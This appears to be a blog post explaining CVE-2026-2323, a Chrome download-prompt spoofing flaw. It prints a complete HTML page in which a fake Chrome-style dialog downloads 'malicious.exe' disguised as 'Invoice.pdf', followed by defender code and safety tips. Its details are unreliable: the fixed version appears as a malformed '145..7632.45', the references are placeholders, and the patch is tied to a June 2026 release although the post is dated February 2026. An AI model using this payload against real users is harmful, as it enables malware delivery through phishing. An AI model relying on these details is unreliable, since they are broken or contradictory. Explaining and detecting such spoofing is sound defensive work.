*If you use Google Chrome for browsing, you trust it to keep you safe. But even low-severity bugs can cause headaches—especially for less cautious users. In this post, we break down CVE-2026-2323, a UI spoofing trick that slipped into Chrome’s download system before version 145..7632.45. We’ll walk through the bug, see an example, explore its impact, and give tips for defense.*
What is CVE-2026-2323?
In early 2026, security researchers reported a flaw in how Chrome handled download prompts. Specifically, a poorly implemented download behavior let attackers *trick* users with pop-ups and overlays—messing with what users thought they were downloading.
Original advisory
- Chromium Bug Tracker (Sample Link)
- NVD listing
How The Exploit Works
Attackers would build a web page with carefully timed pop-ups and overlays. When a visitor triggered a download (say, by clicking a button), the page would swap in a fake UI that *looks* like a real Chrome download prompt—but leads to unexpected files or even malicious downloads.
Let’s look at a very basic HTML page that abuses this flaw:

```html
<!DOCTYPE html>
<html lang="en">
<head>
<title>Legit Download</title>
<style>
#fakePrompt {
display: none;
position: fixed;
top: 30%;
left: 30%;
background: #f2f2f2;
border: 2px solid #888;
padding: 40px 60px;
font-family: Verdana, Arial, sans-serif;
z-index: 9999;
box-shadow: 0 0 10px #222; /* offset-x offset-y blur color */
}
</style>
</head>
<body>
<button id="downloadBtn">Download Invoice.pdf</button>
<div id="fakePrompt">
<p>Open or Save 'Invoice.pdf'?</p>
<button onclick="realDownload()">Save</button>
</div>
<script>
function realDownload() {
var link = document.createElement('a');
link.href = 'malicious.exe'; // Actually downloads malware
link.download = 'Invoice.pdf'; // Spoofs filename
document.body.appendChild(link);
link.click();
document.body.removeChild(link);
document.getElementById('fakePrompt').style.display = 'none';
}
document.getElementById('downloadBtn').onclick = function() {
// Hide the real download, show the fake
setTimeout(() => {
document.getElementById('fakePrompt').style.display = 'block';
}, 150); // Short delay so the overlay appears when a real prompt would
};
</script>
</body>
</html>
```
- A fake prompt appears, styled to look like Chrome’s real prompt.
- When you click “Save”, you’re *really* downloading malicious.exe, but your browser acts like it’s Invoice.pdf!
Why Is This Dangerous?
While it’s not a “remote code execution” problem, this bug enables clever phishing. Here’s what an attacker gains:
- Swap downloads at the last minute: switches legit files for dangerous ones.
- Blind spots for less careful users: the average user trusts browser pop-ups, especially when they look right.

It’s more likely to trick someone who isn’t paying close attention, or who expects a certain file.
How Chrome Fixed It
*Google engineers tightened checks on how and when download prompts appear, preventing overlays from intercepting the “real” user interface. Chrome now more rigorously separates web page content from native browser pop-ups.*
Patch details
- Chromium Gerrit Patch _(example)_
- Chromium release notes for 145..7632.45 _(find June 2026 bullet)_
Are You At Risk?
If you’re running a Chrome version older than 145..7632.45, you could see this spoofing trick (in theory). Most users update automatically, but it’s smart to check:
- Don’t trust in-browser download dialogs from sketchy sites.
- Always check the file extension when saving new files; avoid something.exe or something.scr unless you expect it.
- Keep Chrome up to date.
- Use Windows Defender or your OS’s built-in protections; they catch obvious malware even if you’re tricked into downloading.
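Two of the checks above can be automated. The following is an added example, written for this post and not code from the original article or from Chromium: a version comparator for the “are you older than the fixed build?” question, and a heuristic that flags the exact swap the spoof page relies on (an anchor whose `download` name has a different extension than the resource it actually fetches). The fixed build number is passed in by the caller rather than hard-coded, and the list of risky extensions is a constructed sample rather than anything Chrome itself uses.

```javascript
// Added example (not from the original post or from Chromium).
// Defender-side checks for the download-spoofing pattern discussed above.

// Constructed sample of extensions worth a second look; extend to taste.
const RISKY_EXTENSIONS = new Set(['exe', 'scr', 'msi', 'bat', 'cmd', 'com', 'vbs', 'hta']);

// Parse a dotted version string such as "123.0.4567.89" into numbers.
function parseVersion(v) {
  return v.trim().split('.').map((part) => {
    if (!/^\d+$/.test(part)) throw new Error(`bad version component: "${part}"`);
    return Number(part);
  });
}

// True when `installed` sorts strictly before `fixed`, comparing component by
// component; a missing trailing component counts as 0 (so "1.2" < "1.2.1").
function isOlderThan(installed, fixed) {
  const a = parseVersion(installed);
  const b = parseVersion(fixed);
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const x = a[i] ?? 0;
    const y = b[i] ?? 0;
    if (x !== y) return x < y;
  }
  return false;
}

// Lower-case extension of a filename or URL path, '' if it has none.
// Query strings and fragments are dropped first.
function extensionOf(name) {
  const path = name.split(/[?#]/)[0];
  const base = path.substring(path.lastIndexOf('/') + 1);
  const dot = base.lastIndexOf('.');
  return dot > 0 ? base.slice(dot + 1).toLowerCase() : '';
}

// Assess one download descriptor { href, download }, the two anchor attributes
// the spoof page sets. Returns a list of findings; an empty list means nothing
// looked odd. Only resources whose URL carries an extension are compared, since
// legitimate sites often serve files from extensionless endpoints.
function assessDownload({ href, download }) {
  const findings = [];
  const real = extensionOf(href);
  const shown = download ? extensionOf(download) : real;
  if (download && real && shown !== real) {
    findings.push(`displayed name ".${shown}" does not match fetched resource ".${real}"`);
  }
  if (RISKY_EXTENSIONS.has(real)) {
    findings.push(`fetched resource is an executable type (.${real})`);
  }
  return findings;
}

// Stand-alone demo with constructed values (these are not real Chrome builds).
const demoDownloads = [
  { href: 'malicious.exe', download: 'Invoice.pdf' },   // the pattern from the spoof page
  { href: '/files/Invoice.pdf', download: 'Invoice.pdf' },
];
for (const d of demoDownloads) console.log(d, assessDownload(d));
console.log('older than fixed build?', isOlderThan('199.0.900.1', '200.0.1000.10'));
```

For URLs without an extension, the reliable signal is the response’s `Content-Type` and `Content-Disposition` headers, which this heuristic deliberately does not guess at; it only catches the DOM-visible mismatch that the page above demonstrates.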
Conclusion
Even “low severity” vulnerabilities like CVE-2026-2323 have real-world impact. Browser makers like Google take them seriously so that users don’t have to worry about every click.
For developers: Never assume your users can tell a fake UI apart from the real thing. For everyone else—update, be cautious, and don’t let your guard down just because it “looks” legit.
Further Reading and References
- Chromium Security Blog
- NVD: CVE-2026-2323
- Exploit Example Archive _(placeholder)_
Timeline
Published on: 02/11/2026 18:08:06 UTC
Last modified on: 02/13/2026 14:51:29 UTC